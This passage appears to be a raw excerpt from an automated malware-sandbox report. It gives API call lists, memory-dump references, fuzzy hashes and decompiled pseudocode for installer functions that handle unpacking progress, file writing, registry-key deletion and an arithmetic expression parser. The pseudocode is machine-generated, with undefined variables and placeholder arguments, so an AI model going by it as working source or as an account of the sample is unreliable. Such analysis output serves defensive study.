                                                                                                                                                                                                          • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402DD5
                                                                                                                                                                                                          • wsprintfA.USER32 ref: 00402E09
                                                                                                                                                                                                          • SetWindowTextA.USER32(?,?), ref: 00402E19
                                                                                                                                                                                                          • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402E2B
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2165562026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165547451.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165572222.0000000000408000.00000002.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165581608.000000000040A000.00000004.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165607422.000000000041D000.00000004.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165615181.000000000042C000.00000004.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165621749.0000000000435000.00000004.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165630933.0000000000438000.00000002.00020000.sdmp
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                                                                                          • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                                                                                                                                                                          • API String ID: 1451636040-1158693248
                                                                                                                                                                                                          • Opcode ID: e89816a8dfaa52ff9135695e85eb4a48f8702048c86a46640504a18df176bae7
                                                                                                                                                                                                          • Instruction ID: aa0a6e9b687c9e0f5cd6186ccbd59e0a61a019e4c0b35091a05eaf10890a9e1d
                                                                                                                                                                                                          • Opcode Fuzzy Hash: e89816a8dfaa52ff9135695e85eb4a48f8702048c86a46640504a18df176bae7
                                                                                                                                                                                                          • Instruction Fuzzy Hash: A5F06D7054020CFBEF206F60CE0ABAE3769EB10345F00803AFA06B51D0CBB899558F9A
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 93%
                                                                                                                                                                                                          			E004027DF(void* __ebx, void* __eflags) {
                                                                                                                                                                                                          				void* _t26;
                                                                                                                                                                                                          				long _t31;
                                                                                                                                                                                                          				void* _t45;
                                                                                                                                                                                                          				void* _t49;
                                                                                                                                                                                                          				void* _t51;
                                                                                                                                                                                                          				void* _t54;
                                                                                                                                                                                                          				void* _t55;
                                                                                                                                                                                                          				void* _t56;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t45 = __ebx;
                                                                                                                                                                                                          				 *((intOrPtr*)(_t56 - 0xc)) = 0xfffffd66;
                                                                                                                                                                                                          				_t50 = E00402BCE(0xfffffff0);
                                                                                                                                                                                                          				 *(_t56 - 0x78) = _t23;
                                                                                                                                                                                                          				if(E00405C52(_t50) == 0) {
                                                                                                                                                                                                          					E00402BCE(0xffffffed);
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				E00405DC1(_t50);
                                                                                                                                                                                                          				_t26 = E00405DE6(_t50, 0x40000000, 2);
                                                                                                                                                                                                          				 *(_t56 + 8) = _t26;
                                                                                                                                                                                                          				if(_t26 != 0xffffffff) {
                                                                                                                                                                                                          					_t31 =  *0x42f458;
                                                                                                                                                                                                          					 *(_t56 - 0x30) = _t31;
                                                                                                                                                                                                          					_t49 = GlobalAlloc(0x40, _t31);
                                                                                                                                                                                                          					if(_t49 != _t45) {
                                                                                                                                                                                                          						E0040343E(_t45);
                                                                                                                                                                                                          						E00403428(_t49,  *(_t56 - 0x30));
                                                                                                                                                                                                          						_t54 = GlobalAlloc(0x40,  *(_t56 - 0x20));
                                                                                                                                                                                                          						 *(_t56 - 0x38) = _t54;
                                                                                                                                                                                                          						if(_t54 != _t45) {
                                                                                                                                                                                                          							E004031B7(_t47,  *((intOrPtr*)(_t56 - 0x24)), _t45, _t54,  *(_t56 - 0x20));
                                                                                                                                                                                                          							while( *_t54 != _t45) {
                                                                                                                                                                                                          								_t47 =  *_t54;
                                                                                                                                                                                                          								_t55 = _t54 + 8;
                                                                                                                                                                                                          								 *(_t56 - 0x8c) =  *_t54;
                                                                                                                                                                                                          								E00405DA1( *((intOrPtr*)(_t54 + 4)) + _t49, _t55, _t47);
                                                                                                                                                                                                          								_t54 = _t55 +  *(_t56 - 0x8c);
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							GlobalFree( *(_t56 - 0x38));
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						E00405E8D( *(_t56 + 8), _t49,  *(_t56 - 0x30));
                                                                                                                                                                                                          						GlobalFree(_t49);
                                                                                                                                                                                                          						 *((intOrPtr*)(_t56 - 0xc)) = E004031B7(_t47, 0xffffffff,  *(_t56 + 8), _t45, _t45);
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					CloseHandle( *(_t56 + 8));
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				_t51 = 0xfffffff3;
                                                                                                                                                                                                          				if( *((intOrPtr*)(_t56 - 0xc)) < _t45) {
                                                                                                                                                                                                          					_t51 = 0xffffffef;
                                                                                                                                                                                                          					DeleteFileA( *(_t56 - 0x78));
                                                                                                                                                                                                          					 *((intOrPtr*)(_t56 - 4)) = 1;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				_push(_t51);
                                                                                                                                                                                                          				E00401423();
                                                                                                                                                                                                          				 *0x42f4e8 =  *0x42f4e8 +  *((intOrPtr*)(_t56 - 4));
                                                                                                                                                                                                          				return 0;
                                                                                                                                                                                                          			}











                                                                                                                                                                                                          0x004028c9
                                                                                                                                                                                                          0x004028cd
                                                                                                                                                                                                          0x004028d3
                                                                                                                                                                                                          0x004028d3
                                                                                                                                                                                                          0x004028da
                                                                                                                                                                                                          0x004022dd
                                                                                                                                                                                                          0x00402a5d
                                                                                                                                                                                                          0x00402a69

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 00402833
                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 0040284F
                                                                                                                                                                                                          • GlobalFree.KERNEL32(?), ref: 0040288E
                                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 004028A1
                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 004028B9
                                                                                                                                                                                                          • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 004028CD
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2165562026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165547451.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165572222.0000000000408000.00000002.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165581608.000000000040A000.00000004.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165607422.000000000041D000.00000004.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165615181.000000000042C000.00000004.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165621749.0000000000435000.00000004.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165630933.0000000000438000.00000002.00020000.sdmp
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2667972263-0
                                                                                                                                                                                                          • Opcode ID: 10aa94e9192e65a0b09259698f99f40e5440345eda598c6609a5c103b0ccd052
                                                                                                                                                                                                          • Instruction ID: 6e19ad8f311a8fe4d121ff6d49c8506e1ed5368105aa9b5939d25a16afe37da6
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 10aa94e9192e65a0b09259698f99f40e5440345eda598c6609a5c103b0ccd052
                                                                                                                                                                                                          • Instruction Fuzzy Hash: C0219F72800124BBDF217FA5CE48D9E7E79EF09324F14823EF450762D1CA7949418FA8
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 97%
                                                                                                                                                                                                          			E72E31837(signed int __edx, void* __eflags, void* _a8, void* _a16) {
                                                                                                                                                                                                          				void* _v8;
                                                                                                                                                                                                          				signed int _v12;
                                                                                                                                                                                                          				signed int _v20;
                                                                                                                                                                                                          				signed int _v24;
                                                                                                                                                                                                          				char _v52;
                                                                                                                                                                                                          				void _t45;
                                                                                                                                                                                                          				void _t46;
                                                                                                                                                                                                          				signed int _t47;
                                                                                                                                                                                                          				signed int _t48;
                                                                                                                                                                                                          				signed int _t57;
                                                                                                                                                                                                          				signed int _t58;
                                                                                                                                                                                                          				signed int _t59;
                                                                                                                                                                                                          				signed int _t60;
                                                                                                                                                                                                          				signed int _t61;
                                                                                                                                                                                                          				void* _t67;
                                                                                                                                                                                                          				void* _t68;
                                                                                                                                                                                                          				void* _t69;
                                                                                                                                                                                                          				void* _t70;
                                                                                                                                                                                                          				void* _t71;
                                                                                                                                                                                                          				signed int _t77;
                                                                                                                                                                                                          				void* _t81;
                                                                                                                                                                                                          				signed int _t83;
                                                                                                                                                                                                          				signed int _t85;
                                                                                                                                                                                                          				signed int _t87;
                                                                                                                                                                                                          				signed int _t90;
                                                                                                                                                                                                          				void* _t101;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t85 = __edx;
                                                                                                                                                                                                          				 *0x72e3405c = _a8;
                                                                                                                                                                                                          				_t77 = 0;
                                                                                                                                                                                                          				 *0x72e34060 = _a16;
                                                                                                                                                                                                          				_v12 = 0;
                                                                                                                                                                                                          				_v8 = E72E3123B();
                                                                                                                                                                                                          				_t90 = E72E312FE(_t42);
                                                                                                                                                                                                          				_t87 = _t85;
                                                                                                                                                                                                          				_t81 = E72E3123B();
                                                                                                                                                                                                          				_a8 = _t81;
                                                                                                                                                                                                          				_t45 =  *_t81;
                                                                                                                                                                                                          				if(_t45 != 0x7e && _t45 != 0x21) {
                                                                                                                                                                                                          					_a16 = E72E3123B();
                                                                                                                                                                                                          					_t77 = E72E312FE(_t74);
                                                                                                                                                                                                          					_v12 = _t85;
                                                                                                                                                                                                          					GlobalFree(_a16);
                                                                                                                                                                                                          					_t81 = _a8;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				_t46 =  *_t81;
                                                                                                                                                                                                          				_t101 = _t46 - 0x2f;
                                                                                                                                                                                                          				if(_t101 > 0) {
                                                                                                                                                                                                          					_t47 = _t46 - 0x3c;
                                                                                                                                                                                                          					__eflags = _t47;
                                                                                                                                                                                                          					if(_t47 == 0) {
                                                                                                                                                                                                          						__eflags =  *((char*)(_t81 + 1)) - 0x3c;
                                                                                                                                                                                                          						if( *((char*)(_t81 + 1)) != 0x3c) {
                                                                                                                                                                                                          							__eflags = _t87 - _v12;
                                                                                                                                                                                                          							if(__eflags > 0) {
                                                                                                                                                                                                          								L56:
                                                                                                                                                                                                          								_t48 = 0;
                                                                                                                                                                                                          								__eflags = 0;
                                                                                                                                                                                                          								L57:
                                                                                                                                                                                                          								asm("cdq");
                                                                                                                                                                                                          								L58:
                                                                                                                                                                                                          								_t90 = _t48;
                                                                                                                                                                                                          								_t87 = _t85;
                                                                                                                                                                                                          								L59:
                                                                                                                                                                                                          								E72E31429(_t85, _t90, _t87,  &_v52);
                                                                                                                                                                                                          								E72E31266( &_v52);
                                                                                                                                                                                                          								GlobalFree(_v8);
                                                                                                                                                                                                          								return GlobalFree(_a8);
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							if(__eflags < 0) {
                                                                                                                                                                                                          								L49:
                                                                                                                                                                                                          								__eflags = 0;
                                                                                                                                                                                                          								L50:
                                                                                                                                                                                                          								_t48 = 1;
                                                                                                                                                                                                          								goto L57;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							__eflags = _t90 - _t77;
                                                                                                                                                                                                          							if(_t90 < _t77) {
                                                                                                                                                                                                          								goto L49;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							goto L56;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						_t85 = _t87;
                                                                                                                                                                                                          						_t48 = E72E32EF0(_t90, _t77, _t85);
                                                                                                                                                                                                          						goto L58;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					_t57 = _t47 - 1;
                                                                                                                                                                                                          					__eflags = _t57;
                                                                                                                                                                                                          					if(_t57 == 0) {
                                                                                                                                                                                                          						__eflags = _t90 - _t77;
                                                                                                                                                                                                          						if(_t90 != _t77) {
                                                                                                                                                                                                          							goto L56;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						__eflags = _t87 - _v12;
                                                                                                                                                                                                          						if(_t87 != _v12) {
                                                                                                                                                                                                          							goto L56;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						goto L49;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					_t58 = _t57 - 1;
                                                                                                                                                                                                          					__eflags = _t58;
                                                                                                                                                                                                          					if(_t58 == 0) {
                                                                                                                                                                                                          						__eflags =  *((char*)(_t81 + 1)) - 0x3e;
                                                                                                                                                                                                          						if( *((char*)(_t81 + 1)) != 0x3e) {
                                                                                                                                                                                                          							__eflags = _t87 - _v12;
                                                                                                                                                                                                          							if(__eflags < 0) {
                                                                                                                                                                                                          								goto L56;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							if(__eflags > 0) {
                                                                                                                                                                                                          								goto L49;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							__eflags = _t90 - _t77;
                                                                                                                                                                                                          							if(_t90 <= _t77) {
                                                                                                                                                                                                          								goto L56;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							goto L49;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						__eflags =  *((char*)(_t81 + 2)) - 0x3e;
                                                                                                                                                                                                          						_t85 = _t87;
                                                                                                                                                                                                          						_t59 = _t90;
                                                                                                                                                                                                          						_t83 = _t77;
                                                                                                                                                                                                          						if( *((char*)(_t81 + 2)) != 0x3e) {
                                                                                                                                                                                                          							_t48 = E72E32F10(_t59, _t83, _t85);
                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                          							_t48 = E72E32F40(_t59, _t83, _t85);
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						goto L58;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					_t60 = _t58 - 0x20;
                                                                                                                                                                                                          					__eflags = _t60;
                                                                                                                                                                                                          					if(_t60 == 0) {
                                                                                                                                                                                                          						_t90 = _t90 ^ _t77;
                                                                                                                                                                                                          						_t87 = _t87 ^ _v12;
                                                                                                                                                                                                          						goto L59;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					_t61 = _t60 - 0x1e;
                                                                                                                                                                                                          					__eflags = _t61;
                                                                                                                                                                                                          					if(_t61 == 0) {
                                                                                                                                                                                                          						__eflags =  *((char*)(_t81 + 1)) - 0x7c;
                                                                                                                                                                                                          						if( *((char*)(_t81 + 1)) != 0x7c) {
                                                                                                                                                                                                          							_t90 = _t90 | _t77;
                                                                                                                                                                                                          							_t87 = _t87 | _v12;
                                                                                                                                                                                                          							goto L59;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						__eflags = _t90 | _t87;
                                                                                                                                                                                                          						if((_t90 | _t87) != 0) {
                                                                                                                                                                                                          							goto L49;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						__eflags = _t77 | _v12;
                                                                                                                                                                                                          						if((_t77 | _v12) != 0) {
                                                                                                                                                                                                          							goto L49;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						goto L56;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					__eflags = _t61 == 0;
                                                                                                                                                                                                          					if(_t61 == 0) {
                                                                                                                                                                                                          						_t90 =  !_t90;
                                                                                                                                                                                                          						_t87 =  !_t87;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					goto L59;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				if(_t101 == 0) {
                                                                                                                                                                                                          					L21:
                                                                                                                                                                                                          					__eflags = _t77 | _v12;
                                                                                                                                                                                                          					if((_t77 | _v12) != 0) {
                                                                                                                                                                                                          						_v24 = E72E32D80(_t90, _t87, _t77, _v12);
                                                                                                                                                                                                          						_v20 = _t85;
                                                                                                                                                                                                          						_t48 = E72E32E30(_t90, _t87, _t77, _v12);
                                                                                                                                                                                                          						_t81 = _a8;
                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                          						_v24 = _v24 & 0x00000000;
                                                                                                                                                                                                          						_v20 = _v20 & 0x00000000;
                                                                                                                                                                                                          						_t48 = _t90;
                                                                                                                                                                                                          						_t85 = _t87;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					__eflags =  *_t81 - 0x2f;
                                                                                                                                                                                                          					if( *_t81 != 0x2f) {
                                                                                                                                                                                                          						goto L58;
                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                          						_t90 = _v24;
                                                                                                                                                                                                          						_t87 = _v20;
                                                                                                                                                                                                          						goto L59;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				_t67 = _t46 - 0x21;
                                                                                                                                                                                                          				if(_t67 == 0) {
                                                                                                                                                                                                          					_t48 = 0;
                                                                                                                                                                                                          					__eflags = _t90 | _t87;
                                                                                                                                                                                                          					if((_t90 | _t87) != 0) {
                                                                                                                                                                                                          						goto L57;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					goto L50;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				_t68 = _t67 - 4;
                                                                                                                                                                                                          				if(_t68 == 0) {
                                                                                                                                                                                                          					goto L21;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				_t69 = _t68 - 1;
                                                                                                                                                                                                          				if(_t69 == 0) {
                                                                                                                                                                                                          					__eflags =  *((char*)(_t81 + 1)) - 0x26;
                                                                                                                                                                                                          					if( *((char*)(_t81 + 1)) != 0x26) {
                                                                                                                                                                                                          						_t90 = _t90 & _t77;
                                                                                                                                                                                                          						_t87 = _t87 & _v12;
                                                                                                                                                                                                          						goto L59;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					__eflags = _t90 | _t87;
                                                                                                                                                                                                          					if((_t90 | _t87) == 0) {
                                                                                                                                                                                                          						goto L56;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					__eflags = _t77 | _v12;
                                                                                                                                                                                                          					if((_t77 | _v12) == 0) {
                                                                                                                                                                                                          						goto L56;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					goto L49;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				_t70 = _t69 - 4;
                                                                                                                                                                                                          				if(_t70 == 0) {
                                                                                                                                                                                                          					_t48 = E72E32D40(_t90, _t87, _t77, _v12);
                                                                                                                                                                                                          					goto L58;
                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                          					_t71 = _t70 - 1;
                                                                                                                                                                                                          					if(_t71 == 0) {
                                                                                                                                                                                                          						_t90 = _t90 + _t77;
                                                                                                                                                                                                          						asm("adc edi, [ebp-0x8]");
                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                          						if(_t71 == 0) {
                                                                                                                                                                                                          							_t90 = _t90 - _t77;
                                                                                                                                                                                                          							asm("sbb edi, [ebp-0x8]");
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					goto L59;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          			}





























                                                                                                                                                                                                          0x72e31893
                                                                                                                                                                                                          0x72e31899
                                                                                                                                                                                                          0x72e31899
                                                                                                                                                                                                          0x72e3189c
                                                                                                                                                                                                          0x72e3189f
                                                                                                                                                                                                          0x72e318a2
                                                                                                                                                                                                          0x72e31968
                                                                                                                                                                                                          0x72e31968
                                                                                                                                                                                                          0x72e3196b
                                                                                                                                                                                                          0x72e319e5
                                                                                                                                                                                                          0x72e319e9
                                                                                                                                                                                                          0x72e319f8
                                                                                                                                                                                                          0x72e319fb
                                                                                                                                                                                                          0x72e31a03
                                                                                                                                                                                                          0x72e31a03
                                                                                                                                                                                                          0x72e31a03
                                                                                                                                                                                                          0x72e31a05
                                                                                                                                                                                                          0x72e31a05
                                                                                                                                                                                                          0x72e31a06
                                                                                                                                                                                                          0x72e31a06
                                                                                                                                                                                                          0x72e31a08
                                                                                                                                                                                                          0x72e31a0a
                                                                                                                                                                                                          0x72e31a10
                                                                                                                                                                                                          0x72e31a19
                                                                                                                                                                                                          0x72e31a2a
                                                                                                                                                                                                          0x72e31a35
                                                                                                                                                                                                          0x72e31a35
                                                                                                                                                                                                          0x72e319fd
                                                                                                                                                                                                          0x72e319e0
                                                                                                                                                                                                          0x72e319e0
                                                                                                                                                                                                          0x72e319e2
                                                                                                                                                                                                          0x72e319e2
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x72e319e2
                                                                                                                                                                                                          0x72e319ff
                                                                                                                                                                                                          0x72e31a01
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x72e31a01
                                                                                                                                                                                                          0x72e319ed
                                                                                                                                                                                                          0x72e319f1
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x72e319f1
                                                                                                                                                                                                          0x72e3196d
                                                                                                                                                                                                          0x72e3196d
                                                                                                                                                                                                          0x72e3196e
                                                                                                                                                                                                          0x72e319d7
                                                                                                                                                                                                          0x72e319d9
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x72e319db
                                                                                                                                                                                                          0x72e319de
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x72e319de
                                                                                                                                                                                                          0x72e31970
                                                                                                                                                                                                          0x72e31970
                                                                                                                                                                                                          0x72e31971
                                                                                                                                                                                                          0x72e319aa
                                                                                                                                                                                                          0x72e319ae
                                                                                                                                                                                                          0x72e319ca
                                                                                                                                                                                                          0x72e319cd
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x72e319cf
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x72e319d1
                                                                                                                                                                                                          0x72e319d3
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x72e319d5
                                                                                                                                                                                                          0x72e319b0
                                                                                                                                                                                                          0x72e319b4
                                                                                                                                                                                                          0x72e319b6
                                                                                                                                                                                                          0x72e319b8
                                                                                                                                                                                                          0x72e319ba
                                                                                                                                                                                                          0x72e319c3
                                                                                                                                                                                                          0x72e319bc
                                                                                                                                                                                                          0x72e319bc
                                                                                                                                                                                                          0x72e319bc
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x72e319ba
                                                                                                                                                                                                          0x72e31973
                                                                                                                                                                                                          0x72e31973
                                                                                                                                                                                                          0x72e31976
                                                                                                                                                                                                          0x72e319a3
                                                                                                                                                                                                          0x72e319a5
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x72e319a5
                                                                                                                                                                                                          0x72e31978
                                                                                                                                                                                                          0x72e31978
                                                                                                                                                                                                          0x72e3197b
                                                                                                                                                                                                          0x72e3198b
                                                                                                                                                                                                          0x72e3198f
                                                                                                                                                                                                          0x72e3199c
                                                                                                                                                                                                          0x72e3199e
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x72e3199e
                                                                                                                                                                                                          0x72e31991
                                                                                                                                                                                                          0x72e31993
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x72e31995
                                                                                                                                                                                                          0x72e31998
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x72e3199a
                                                                                                                                                                                                          0x72e3197e
                                                                                                                                                                                                          0x72e3197f
                                                                                                                                                                                                          0x72e31985
                                                                                                                                                                                                          0x72e31987
                                                                                                                                                                                                          0x72e31987
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x72e3197f
                                                                                                                                                                                                          0x72e318a8
                                                                                                                                                                                                          0x72e31920
                                                                                                                                                                                                          0x72e31922
                                                                                                                                                                                                          0x72e31925
                                                                                                                                                                                                          0x72e31943
                                                                                                                                                                                                          0x72e31946
                                                                                                                                                                                                          0x72e3194c
                                                                                                                                                                                                          0x72e31951
                                                                                                                                                                                                          0x72e31927
                                                                                                                                                                                                          0x72e31927
                                                                                                                                                                                                          0x72e3192b
                                                                                                                                                                                                          0x72e3192f

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2167878164.0000000072E31000.00000020.00020000.sdmp, Offset: 72E30000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.2167873253.0000000072E30000.00000002.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2167884351.0000000072E33000.00000002.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2167889901.0000000072E35000.00000002.00020000.sdmp
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: FreeGlobal
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2979337801-0
                                                                                                                                                                                                          • Opcode ID: 0596f453eac5647b640ead29f94240e48f46d8e07c078325f79090761284308e
                                                                                                                                                                                                          • Instruction ID: 03b6ef715e458e74563918a2f9f8bfd7195af556b71040e25202c9ed21437cea
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0596f453eac5647b640ead29f94240e48f46d8e07c078325f79090761284308e
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9451D472D04198AEDF038FACC8446ADBBB5AB4534FFD5E09EE406AB107C6319942C771
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 48%
                                                                                                                                                                                                          			E00402CD0(void* __eflags, void* _a4, char* _a8, signed int _a12) {
                                                                                                                                                                                                          				void* _v8;
                                                                                                                                                                                                          				int _v12;
                                                                                                                                                                                                          				char _v276;
                                                                                                                                                                                                          				void* _t27;
                                                                                                                                                                                                          				signed int _t33;
                                                                                                                                                                                                          				intOrPtr* _t35;
                                                                                                                                                                                                          				signed int _t45;
                                                                                                                                                                                                          				signed int _t46;
                                                                                                                                                                                                          				signed int _t47;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t46 = _a12;
                                                                                                                                                                                                          				_t47 = _t46 & 0x00000300;
                                                                                                                                                                                                          				_t45 = _t46 & 0x00000001;
                                                                                                                                                                                                          				_t27 = E004060D3(__eflags, _a4, _a8, _t47 | 0x00000009,  &_v8);
                                                                                                                                                                                                          				if(_t27 == 0) {
                                                                                                                                                                                                          					if((_a12 & 0x00000002) == 0) {
                                                                                                                                                                                                          						L3:
                                                                                                                                                                                                          						_push(0x105);
                                                                                                                                                                                                          						_push( &_v276);
                                                                                                                                                                                                          						_push(0);
                                                                                                                                                                                                          						while(RegEnumKeyA(_v8, ??, ??, ??) == 0) {
                                                                                                                                                                                                          							__eflags = _t45;
                                                                                                                                                                                                          							if(__eflags != 0) {
                                                                                                                                                                                                          								L10:
                                                                                                                                                                                                          								RegCloseKey(_v8);
                                                                                                                                                                                                          								return 0x3eb;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							_t33 = E00402CD0(__eflags, _v8,  &_v276, _a12);
                                                                                                                                                                                                          							__eflags = _t33;
                                                                                                                                                                                                          							if(_t33 != 0) {
                                                                                                                                                                                                          								break;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							_push(0x105);
                                                                                                                                                                                                          							_push( &_v276);
                                                                                                                                                                                                          							_push(_t45);
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						RegCloseKey(_v8);
                                                                                                                                                                                                          						_t35 = E00406656(3);
                                                                                                                                                                                                          						if(_t35 != 0) {
                                                                                                                                                                                                          							return  *_t35(_a4, _a8, _t47, 0);
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						return RegDeleteKeyA(_a4, _a8);
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					_v12 = 0;
                                                                                                                                                                                                          					if(RegEnumValueA(_v8, 0,  &_v276,  &_v12, 0, 0, 0, 0) != 0x103) {
                                                                                                                                                                                                          						goto L10;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					goto L3;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				return _t27;
                                                                                                                                                                                                          			}












                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00402d2f
                                                                                                                                                                                                          0x00402db7

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402D24
                                                                                                                                                                                                          • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402D70
                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?,?,?), ref: 00402D79
